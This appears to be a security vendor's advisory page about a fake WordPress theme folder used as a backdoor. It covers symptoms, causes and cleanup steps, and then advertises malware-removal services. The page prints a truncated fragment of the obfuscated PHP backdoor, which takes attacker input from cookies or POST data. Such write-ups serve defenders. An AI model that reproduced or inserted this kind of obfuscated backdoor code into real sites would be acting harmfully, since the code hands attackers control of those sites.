If you find a unknown or nulled theme in your WordPress website, it might indicate that your site is infected with WordPress malware. Such malware gives the hacker complete access to your WordPress site through backdoors


  • There are unknown files or folders at wp-content/themes
  • Your website visitors are being redirected to spammy websites with viruses
  • Your site gets infected with malware even after you have deleted the bad files

Location of the fake theme in WordPress Site

  • /wp-content/themes/gyjjcrxedo/
<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["m\x79\x70\x61c\x63\x73\x76"]="\x5f1";${"\x47\x4cOBAL\x53"}["h\x6fq\x70\x75\x73p\x67l\x73v"]="\x5f\x30";$GLOBALS["\x5f1\x371515\x319\x31_"]=Array("str\x5f"."ro\x741\x33","\x70\x61\x63\x6b","\x73\x74"."r\x72\x65\x76");function _1178619035($i){$rymhgnsq="\x61";$ijkxdjo="a";$ibnyrutvve="\x69";${$rymhgnsq}=Array("jwe\x79c","aesko\x6cy","\x6fwhg\x67i\x6b\x75","c\x61l\x6c\x62r\x68y","H*");return${$ijkxdjo}[${$ibnyrutvve}];}function l__0($_0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x6f\x67\x75x\x69\x72\x70\x69"]="\x5f\x30";return isset($_COOKIE[${${"GLO\x42\x41\x4c\x53"}["\x68oq\x70\x75s\x70\x67\x6c\x73\x76"]}])?$_COOKIE[${${"G\x4c\x4fB\x41\x4c\x53"}["\x6do\x67u\x78i\x72\x70i"]}]:@$_POST[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}

Cause of the hack - Fake WP theme in wp-content/themes folder

  • WordPress core or plugins are not updated
  • You have multiple websites on the same server, which are causing cross-site infection
  • Vulnerabilities in the theme or plugins

Steps to Fix

  • You can delete the fake theme folder from your WordPress site after taking a backup
  • Search your server for other viruses by running a malware scan - as it is likely that a hacker would have placed more backdoors
  • Check for any fake WordPress plugins that may be installed on the site (wp-content/plugins folder)
  • Update your WordPress code version, plugins, themes
  • Install a Web Application Firewall to prevent such hacks

Need professional help to fix hacked WordPress? Drop us a message on the chat widget and we’d be happy to help you. Fix my WordPress website now.

Clean My Hacked Website Now

Website Malware Cleanup Website Malware Cleanup

Have you been hacked? Do you need help with fixing your website? We provide professional malware cleanup services to get your business back online quickly.

Removal of Security Warnings Removal of Security Warnings

If your website is hacked, your visitors may be shown a warning message. Astra will take the necessary steps to remove your website from the blacklists ASAP.

Astra Website Firewall (WAF) Website Firewall (WAF)

Stop future website hacks with Astra WAF & protect your website. No hassle out-of-the-box security tailored to your technology stack & CMSs like WordPress, Magento, Opencart etc.

Real Human Support Real Human Support

Astra's team of security engineers guide you through your security journey. We believe in customers first, so no waiting in long queues to get your queries answered.

This information is provided as part of the Astra community project. All information should be considered as-is, without guarantees. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to [email protected]

Astra Pro Plan
Get Started
Custom Security Rules
Rock-solid Website Firewall
Automatic Malware Scanner
Bad Bot Protection
Blacklist Monitoring
File Upload Scanning
IP & Country Blocking
GDPR Consent Tool